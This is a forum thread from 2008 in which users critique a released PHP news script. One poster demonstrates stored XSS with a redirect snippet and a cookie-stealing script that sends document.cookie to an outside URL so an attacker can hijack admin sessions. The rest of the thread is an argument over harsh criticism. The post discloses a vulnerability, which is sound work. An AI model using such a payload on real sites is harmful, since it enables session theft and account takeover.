It's a news panel not a forum, normal user aren't supposed to be able to post news at all which is probably why there's no way of registering. Unfortunately there's no way of admins to register as well apart from md5ing their own password and adding themselves by phpMyAdmin. There's quite a few bad things about this panel, but there isn't an XSS risk where you pointed it out.Originally Posted by Dentafrice
Very good protection against XSS! Very much..
---------------------------------------
Back to the XSS thing.. so now that we've proved it has XSS vulnerabilites.. how easy is it to take over the entire panel.. now that the "Latest News" is shown to anyone who views the panel.. logged in or not..
This is easy..
But what about something like this?
Of course redirecting it to a much.. how can I say.. annoying? Site would be just as easy..Code:<script>window.location = "http://www.google.com";</script>
Or we could get even more advanced (if the panel had user levels).. and begin stealing admin's sessions..
How about something like that? Now we have the user's PHPSESSID and can easily "become them".. because all you check is the $_SESSION['username'].. nothing else..Code:<script type="text/javascript"> var div = $('header'); var element = document.createElement('img'); element.src="http://mysite.com/test.php?cookie="+encodeURI(document.cookie); element.style.display = "none"; div.appendChild(element); </script>
how secure..
0.5/10
- Caleb
Results 31 to 40 of 63
Thread: [Release] News script
-
Last edited by Jxhn; 20-12-2008 at 02:45 PM.
-
When I started coding.. I got the same criticism and "immature" comments that I give now. Originally Posted by Excellent2
If you can't learn to take criticism and rude posts.. you're not going to make anything out of yourself.. and you'll develop bad habits.
I don't think I'm better then anybody in anyway possible.. I know quite a few people who will always be better then me..
1. Tomm
2. Mentor
3. Tomlegend
4. JustOne
5. Baving
6. Jin
and I treat everyone of those people with the respect they deserve.. and look up to quite a few of them.
And your comment above..
I really don't give a damn about his project.. it's not going to get anywhere.. it might be something 'fun' for him to do when he gets home from school..
I told him what I thought of it, and that's all I'm going to do.
You can reply with however you like, but my opinion is my opinion.. and if I want to express it in the way that I do, I will continue to do so.. because most of the time.. the criticism that I give.. gets to that person's head.. and makes them a better coder..
I've been here long enough, seen plenty of projects pass by, and gave countless posts of pure rudeness.. and I see those people today, and those projects.. and they're 95x better at what they're doing then I ever thought they would.
It all depends on how you take it..
Apparently you didn't get criticized enough.
Of course it's not a forum.. no-one ever said it was.. Originally Posted by Jxhn
You're telling me there aren't any XSS risks.. when I just proved it. Say you hired a member of staff.. he posted news.. he got a bit unruly and started hiding some code within his posts..
He could redirect the site anytime he wanted.. use JS to change anything he wanted on the site..
That's XSS flaws right there.. so please don't tell me "there aren't any.." when there is.Last edited by Dentafrice; 20-12-2008 at 02:45 PM.
-
Why are you flaming Caleb, when he has brought up many SERIOUS issues and areas which anyone could access, with the script?
If he had never posted then the author wouldn't know where his code has vunerabilities and how to fix them."RETIRED" FROM HABBO(X)
:¬:
TOMSPIT / COWLY05
-
You're entitled to your opinion and I respect your opinion but I just ask that you try not to belittle everybody because they're not at your level. Is that too much to ask or what? Originally Posted by Dentafrice
Back for a while.
-
Thank you Originally Posted by TomSpit
+REP. Finally someone with some sense haha.
I don't try to belittle everyone.. I never once said I was better at PHP then him (in a direct way). I told him what I thought of the project.. and pointed out the flaws in it. Originally Posted by Excellent2
Last edited by Dentafrice; 20-12-2008 at 02:48 PM.
-
He just brought the vunerabilites of the script to attention. He isn't trying to put down the creator. Originally Posted by Excellent2
"RETIRED" FROM HABBO(X)
:¬:
TOMSPIT / COWLY05
-
"All I can say.. is this is a pile of crap.. it halfway works.. looks like crap.. extremely bad coding.. extremely insecure". Originally Posted by TomSpit
-
He's putting down the php coding, not the creator Originally Posted by Invent
Anyway, I think the creator should be glad Caleb posted, he will learn from his mistakes now.
"RETIRED" FROM HABBO(X)
:¬:
TOMSPIT / COWLY05
-
No but comments such as "it was laughable" were really not needed were they? Originally Posted by Dentafrice
Where did I say that he shouldn't have mentioned the flaws in his script? All I said was there was no need for some of the comments used. Originally Posted by TomSpit
Back for a while.
-
That's right. Originally Posted by TomSpit
He's putting down the php coding, not the creator Anyway, I think the creator should be glad Caleb posted, he will learn from his mistakes now.
I never once said "you're an idiot you stupid piece of **** you'll never make it anywhere with coding like that you stupid idiot."
I just said the coding was horrible. If he wants to take it and let it "put him down", so be it.
Reply With Quote
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts